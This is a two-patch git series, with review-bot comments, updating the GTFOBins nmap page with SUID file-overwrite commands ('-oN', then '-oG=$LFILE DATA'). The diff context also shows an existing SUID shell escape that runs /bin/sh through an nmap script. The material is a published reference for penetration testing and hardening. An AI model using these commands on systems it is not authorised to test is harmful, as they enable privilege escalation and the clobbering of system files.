From edc8a2d03da03caf8e0b698938f6c0895a395964 Mon Sep 17 00:00:00 2001
From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com>
Date: Mon, 4 Jan 2021 12:16:29 +0500
Subject: [PATCH 1/2] Adding another usage of Nmap's SUID

I came across this method on Stack Overflow while trying to execute commands using a SUID nmap binary; `--script` failed me, but this works. Could be enough to demonstrate the effect of using SUID on Nmap.

I've yet to come up with a way to overwrite the contents of the system file with what we want; with this we can only overwrite files with nmap output.

```bash
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
```
---
 _gtfobins/nmap.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 7374564..0d4ccc6 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -108,4 +108,9 @@ functions: TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF ./nmap --script=$TF + - description: This will over-write files with nmap output, use with caution. + code: | + sudo touch /etc/filecantbetouched + nmap 127.0.0.1 -oN=/etc/filecantbetouched + cat /etc/filecantbetouched ---

From 5b2d89b99aafd4795851d159664311adc355a81f Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 4 Jan 2021 08:58:56 +0100
Subject: [PATCH 2/2] Fix nmap SUID file-write

---
 _gtfobins/nmap.md | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 0d4ccc6..ba93dde 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -87,6 +87,10 @@ functions: TF=$(mktemp) echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF nmap --script=$TF + - description: The payload appears inside the regular nmap output. + code: | + LFILE=file_to_write + nmap -oG=$LFILE DATA file-read: - code: | TF=$(mktemp) 
@@ -108,9 +112,9 @@ functions: TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF ./nmap --script=$TF - - description: This will over-write files with nmap output, use with caution. + suid: + - description: The payload appears inside the regular nmap output. code: | - sudo touch /etc/filecantbetouched - nmap 127.0.0.1 -oN=/etc/filecantbetouched - cat /etc/filecantbetouched + LFILE=file_to_write + ./nmap -oG=$LFILE DATA ---
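Review bot: In the patch 1 hunk at @@ -108,4 +108,9 @@ the new entry bundles setup and verification with the technique: `sudo touch /etc/filecantbetouched` needs sudo, which a SUID entry must not assume, and `cat /etc/filecantbetouched` only checks the result. Reduce the entry to the single command that performs the write, use `./nmap` as the neighbouring SUID entry (`./nmap --script=$TF`) does rather than `nmap`, and replace the live scan of `127.0.0.1` with a placeholder target. Since `-oN` gives the attacker no control over the file contents beyond nmap's own report (the commit message itself says "we can only over-write files with nmap output"), the description should state that limitation, or the entry should switch to `-oG` with an attacker-chosen target argument, as the follow-up patch does, so that a chosen string lands in the written file.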
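Review bot: In the patch 2 hunk at @@ -87,6 +87,10 @@ the description "The payload appears inside the regular nmap output" does not say where the payload enters: `DATA` is passed as nmap's target argument, and `-oG=$LFILE` replaces the whole file with grepable-format output, so the payload ends up embedded between nmap's own header and footer lines rather than written verbatim. State both points, and keep the overwrite warning the earlier entry carried ("use with caution"), because the file-write entry as written gives no hint that an existing file is clobbered. Separately, the context line above the insertion, `echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF`, has unbalanced single quotes as shown here; if that is not an extraction artefact it deserves its own fix.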
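Review bot: In the patch 2 hunk at @@ -108,9 +112,9 @@ the new `suid:` entry reuses the file-write description word for word, so nothing tells the reader what differs in the SUID case: the output file named by `LFILE=file_to_write` is created or replaced with the privileges of the binary's owner, which is the whole point of listing it under `suid`. Either cross-reference the file-write entry or restate that the target file is overwritten with nmap's grepable output around the chosen `DATA` string. Dropping the `sudo touch` and `cat` lines and switching to `./nmap` is the right call; the removed `cat` check belongs in the description, if anywhere, not in the command list.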